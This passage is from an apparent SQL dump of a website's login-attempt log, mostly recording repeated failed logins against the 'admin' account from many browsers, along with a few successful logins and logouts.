','Mozilla/5.0'),(764,2626,1694466618.221650,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 3L','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0'),(765,2626,1694466618.233433,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 3L','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0'),(766,2627,1694466618.526392,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(767,2628,1694466624.334366,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0'),(768,2630,1694466625.950251,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0- \r','Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1'),(769,2635,1694466641.628654,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 3L','Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(770,2636,1694466645.874763,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 z','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(771,2638,1694466648.445453,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 z','Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0'),(772,2642,1694467086.375494,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘^','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(773,2649,1694468320.261527,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(774,2660,1694469493.144120,1,'loginFailValidUsername','sara',2,'*\0a@$X\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(775,2667,1694471015.017608,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0K','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(776,2671,1694471878.218517,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0u','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'),(777,2672,1694471880.834493,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 z','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36'),(778,2674,1694471888.872083,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36'),(779,2675,1694471896.111457,1,'loginFailValidUsername','admin',1,'*x\0\0\0\0\0\0\0h','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'),(780,2676,1694471900.843071,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0+9v','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0'),(781,2703,1694477310.149706,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0q','Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/91.0.4472.80 Mobile/15E148 Safari/604.1'),(782,2704,1694477313.208430,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0h;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(783,2705,1694477321.493903,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0h;','Mozilla/5.0 (Linux; Android 10; SM-G960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(784,2707,1694477328.093655,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0p','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(785,2708,1694477331.934587,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0+9v','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'),(786,2709,1694477337.910879,1,'loginFailValidUsername','admin',1,'*G\0i\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36'),(787,2711,1694477352.930095,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0'),(788,2711,1694477352.939867,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0B','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0'),(789,2712,1694477355.765800,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0,`','Mozilla/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/91.0.4472.80 Mobile/15E148 Safari/604.1'),(790,2713,1694477356.717841,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 ','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(791,2714,1694477364.504153,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0h;','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0'),(792,2736,1694480923.831477,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0K','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(793,2746,1694483011.616930,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0_','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(794,2747,1694483012.418936,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0_','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36'),(795,2750,1694483016.953337,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0_','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'),(796,2753,1694483020.752781,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0_','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(797,2754,1694483031.165149,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0_','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0'),(798,2755,1694483033.328436,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0\n','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0'),(799,2756,1694483034.168690,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0P','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(800,2758,1694483038.309317,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0'),(801,2759,1694483038.443939,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0gH','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(802,2760,1694483052.061266,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0__x','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(803,2766,1694486889.963630,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0hZ','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(804,2782,1694494119.980716,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0@*#','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(805,2792,1694498446.491827,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0&E*.','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36'),(806,2796,1694500851.582881,1,'loginFailInvalidUsername','Equipo2',0,'\0\0\0\0\0\0\0\0\0\03&4','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0'),(807,2798,1694501667.348822,0,'logout','admin',1,'\0\0\0\0\0\0\0\0\0\0A','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(808,2799,1694501745.037768,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0^?.','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(809,2801,1694502138.050873,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0^u','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0'),(810,2802,1694502140.462215,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 z','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36'),(811,2802,1694502140.470556,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 z','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36'),(812,2804,1694502145.106031,1,'loginFailValidUsername','admin',1,'*\0ր\0 \0P\0\0\0\0\0\0Z','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(813,2806,1694503281.472282,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'),(814,2807,1694503554.096486,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0p','Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'),(815,2808,1694503558.481309,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 3L','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0'),(816,2809,1694503563.192098,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0_','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(817,2810,1694503569.669092,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0+','Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(818,2811,1694503571.319995,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0C','Mozilla/5.0 (Linux; Android 10; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Mobile Safari/537.36'),(819,2812,1694503573.896631,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0#(','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0'),(820,2813,1694503579.359587,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0z|<','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'),(821,2816,1694504151.070558,0,'logout','admin',1,'\0\0\0\0\0\0\0\0\0\0^?.','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(822,2819,1694504870.998597,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7'),(823,2821,1694505925.983568,1,'loginFailInvalidUsername','karina',0,'\0\0\0\0\0\0\0\0\0\0Am','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(824,2834,1694508438.235765,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0C','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(825,2835,1694508439.230248,1,'loginFailValidUsername','admin',1,'*\0ր\0 \0P\0\0\0\0\0\0Z','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(826,2837,1694508447.041237,1,'loginFailValidUsername','admin',1,'*\0ր\0 \0P\0\0\0\0\0\0Z','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0'),(827,2838,1694508498.334947,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(828,2841,1694509329.189097,0,'loginOK','admin',1,'\0\0\0\0\0\0\0\0\0\0A','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(829,2844,1694510337.420965,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(830,2845,1694510560.037652,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0^?.','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(831,2846,1694510610.571843,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0^?.','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(832,2847,1694510659.956896,0,'loginOK','Bibbi',3,'\0\0\0\0\0\0\0\0\0\0^?.','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15'),(833,2853,1694513999.568036,1,'loginFailValidUsername','sara',2,'*\n\0^/tȎ','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(834,2856,1694514156.772889,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0g`','Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/20.6.14'),(835,2858,1694514164.974200,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 z','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0'),(836,2860,1694514179.647190,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0g =','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0'),(837,2862,1694514195.029370,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0.','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0'),(838,2864,1694514209.995802,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0u','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(839,2865,1694514216.189337,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0@l','Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/91.0.4472.80 Mobile/15E148 Safari/604.1'),(840,2879,1694520216.653742,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 z','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'),(841,2879,1694520216.666837,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 z','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36'),(842,2880,1694520217.403547,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0.','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0'),(843,2881,1694520222.740783,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/91.0.4472.80 Mobile/15E148 Safari/604.1'),(844,2882,1694520223.180856,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0'),(845,2884,1694520229.071022,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36'),(846,2886,1694520237.798312,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 z','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),(847,2887,1694520244.541188,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0i','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(848,2888,1694520245.779076,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0+','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36'),(849,2889,1694520248.116324,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 z','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(850,2891,1694520257.338460,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0.','Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1'),(851,2901,1694525640.095695,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0@*;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(852,2903,1694526797.111402,1,'loginFailInvalidUsername','3398303019g',0,'\0\0\0\0\0\0\0\0\0\0V','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(853,2904,1694526797.908091,1,'loginFailInvalidUsername','3398303019g',0,'\0\0\0\0\0\0\0\0\0\0V','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(854,2905,1694526798.737724,1,'loginFailInvalidUsername','3398303019g',0,'\0\0\0\0\0\0\0\0\0\0V','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(855,2906,1694526799.529122,1,'loginFailInvalidUsername','3398303019g',0,'\0\0\0\0\0\0\0\0\0\0V','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(856,2907,1694526800.297960,1,'loginFailInvalidUsername','3398303019g',0,'\0\0\0\0\0\0\0\0\0\0V','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(857,2908,1694526802.045080,1,'loginFailInvalidUsername','3398303019g',0,'\0\0\0\0\0\0\0\0\0\0V','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(858,2909,1694526809.537476,1,'loginFailInvalidUsername','Krzysiek',0,'$\0\0\0\0\0< 4','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0'),(859,2912,1694527168.278485,1,'loginFailValidUsername','admin',1,'*\0ր\0 \0P\0\0\0\0\0\0Z','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(860,2912,1694527168.289962,1,'loginFailValidUsername','admin',1,'*\0ր\0 \0P\0\0\0\0\0\0Z','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36'),(861,2914,1694527173.222082,1,'loginFailValidUsername','admin',1,'*\0ր\0 \0P\0\0\0\0\0\0Z','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36'),(862,2916,1694527186.303035,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0e4','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36'),(863,2919,1694527193.582621,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0q','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0'),(864,2926,1694528605.552540,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0%','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(865,2929,1694530747.091220,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0՘','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36'),(866,2932,1694533075.810230,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 z','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36'),(867,2933,1694533077.938531,1,'loginFailValidUsername','admin',1,' @\0\0\0\0\0\0\0\0\0Y','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0'),(868,2934,1694533085.427368,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 z','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0'),(869,2934,1694533085.434018,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0 z','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0'),(870,2935,1694533090.781418,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\03Q(','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'),(871,2935,1694533090.789154,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\03Q(','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0'),(872,2936,1694533096.719656,1,'loginFailValidUsername','admin',1,'*\0ր\0 \0P\0\0\0\0\0\0Z','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36'),(873,2939,1694533102.748815,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0q','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36'),(874,2940,1694533103.082152,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0q','Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0'),(875,2942,1694533111.373886,1,'loginFailValidUsername','admin',1,'*\0ր\0 \0P\0\0\0\0\0\0Z','Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0'),(876,2946,1694534892.182990,1,'loginFailInvalidUsername','angela-accettura',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(877,2947,1694534893.045831,1,'loginFailInvalidUsername','angela-accettura',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(878,2948,1694534893.928994,1,'loginFailInvalidUsername','angela-accettura',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(879,2949,1694534894.823277,1,'loginFailInvalidUsername','angela-accettura',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(880,2950,1694534895.664267,1,'loginFailInvalidUsername','angela-accettura',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(881,2951,1694534896.523609,1,'loginFailInvalidUsername','angela-accettura',0,'\0\0\0\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(882,2957,1694538548.160955,1,'loginFailValidUsername','admin',1,'*Ȫ\0\0\0\0\0\0\0','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),(883,2958,1694538552.141332,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0,h','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0'),(884,2960,1694538556.281468,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0p','Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 